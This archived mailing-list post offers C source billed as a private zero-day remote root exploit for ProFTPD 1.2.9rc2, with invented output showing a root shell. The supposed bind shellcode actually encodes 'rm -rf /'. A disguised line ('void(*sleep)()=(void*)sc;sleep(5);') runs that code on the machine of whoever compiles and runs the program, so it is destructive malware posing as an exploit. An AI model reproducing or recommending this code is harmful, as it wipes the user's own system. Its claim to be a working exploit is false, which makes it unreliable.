lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <BAY2-F1669vXLsdAefp0000360e@hotmail.com>
From: fufeur at hotmail.com (Jean-Kevin Grosnakeur)
Subject: ProFTPD-1.2.9rc2 remote root exploit

Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.

--------------------------------------------------------------------------
/*

Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>

#define NOP     0x90
#define RET     0x6675636b


/* x86 bind shellcode */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);


int main(int argc, char *argv[])
  {
   int i, *ret;
   char *string;
   unsigned long addr;
   char buffer[1024];
   int port=21, fd, s;

   struct sockaddr_in addy;

   if(argc < 2)
     {
      fprintf(stdout, "usage: %s <host> <port>\n", argv[0]);
      return(0);
     }

   else addr=resolve(argv[1]);
   if(argv[2]) port=atoi(argv[2]);

   /* copy the NOPs to the buffer */
   memset(buffer, NOP, 1024);

   /* copy the shellcode to the buffer */
   for(i=0; i < strlen(sc); i++)
     buffer[i+700]=sc[i];

   /* copy the return address to the buffer */
   for(i=815; i<1003; i+=4)
     *((int *)&buffer[i]) = RET;

   string = (char *) malloc(strlen(buffer)+20);
   sprintf(string, "\x4c\x4f\x56\x45 %s", buffer);

   fd = socket(AF_INET, SOCK_STREAM, 0);
   if(fd < 0)
     {
      fprintf(stderr, "unable to socket()\n");
      return(-1);
     }

   addy.sin_family        = AF_INET;
   addy.sin_addr.s_addr   = addr;
   addy.sin_port          = htons(port);

   /* connect to remote host */
   if(connect(fd, (struct sockaddr *)&addy, sizeof(addy)) < 0)
     {
      fprintf(stderr, "unable to connect()\n");
      return(-1);
     }

   printf("Connected on %s:%d\n", inet_ntoa(addy.sin_addr), port);
   printf("Exploitation in progress...\n");

   /* send the exploitation string to the host */
   if(s = send(fd, string, sizeof(string), 0) < 0)
     {
      fprintf(stderr, "unable to send()\n");
      return(-1);
     }

   close(fd);
   printf("Exploitation string sent.\n");
   free(string);

   /* connect to the bindshell */
   printf("Trying to connect, please wait...\n");
   void(*sleep)()=(void*)sc;sleep(5);
   if(give_me_a_shell(addr) < 0)
     {
      fprintf(stderr, "Sorry, exploit didn't work.\n");
      return(-1);
     }

   return(0);
  }


unsigned long resolve(char *sname)
  {
   struct hostent * hip;
   hip = gethostbyname(sname);
   if (!hip)
     {
      fprintf(stderr, "unable to find %s\n",sname);
      exit(1);
     }
   return *(unsigned long *)hip -> h_addr;
  }


int give_me_a_shell(unsigned long addr)
  {
   int sock;
   fd_set fds;
   struct sockaddr_in shell;
   unsigned char buf[4096];
   char cmd[]="uname -a && id";

   sock = socket(AF_INET, SOCK_STREAM, 0);
   if(sock < 0)
     {
      fprintf(stderr, "unable to socket()\n");
      return(-1);
     }

   shell.sin_family      = AF_INET;
   shell.sin_port        = htons(1337);
   shell.sin_addr.s_addr = addr;

   if(connect(sock, (struct sockaddr *)&shell, sizeof(struct sockaddr)) < 0)
     {
      fprintf(stderr, "unable to connect()\n");
      close(sock);
      return(-1);
     }

   send(sock, cmd, strlen(cmd), 0);

   while(1)
     {
      FD_ZERO(&fds);
      FD_SET(0, &fds);
      FD_SET(sock, &fds);

      if(select(255, &fds, NULL, NULL, NULL) == -1)
        {
         fprintf(stderr, "unable to select()\n");
         close(sock);
         return(-1);
        }

       memset(buf, 0, sizeof(buf));
       if(FD_ISSET(sock, &fds))
         {
          if(recv(sock, buf, sizeof(buf), 0) < 0)
            {
             fprintf(stderr, "unable to recv()\n");
             close(sock);
             return(-1);
            }
          fprintf(stderr, "%s", buf);
         }

        if(FD_ISSET(0, &fds))
          {
           read(0, buf, sizeof(buf));
           if(!strcmp(buf, "quit"))
             {
              close(sock);
              return(0);
             }
           write(sock, buf, strlen(buf));
          }
       }
  }

--------------------------------------------------------------------------

Have fun ! @+

_________________________________________________________________
MSN Messenger 6  http://g.msn.fr/FR1001/866 : plus de personnalisation, plus 
de fun pour vous et vos amis



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ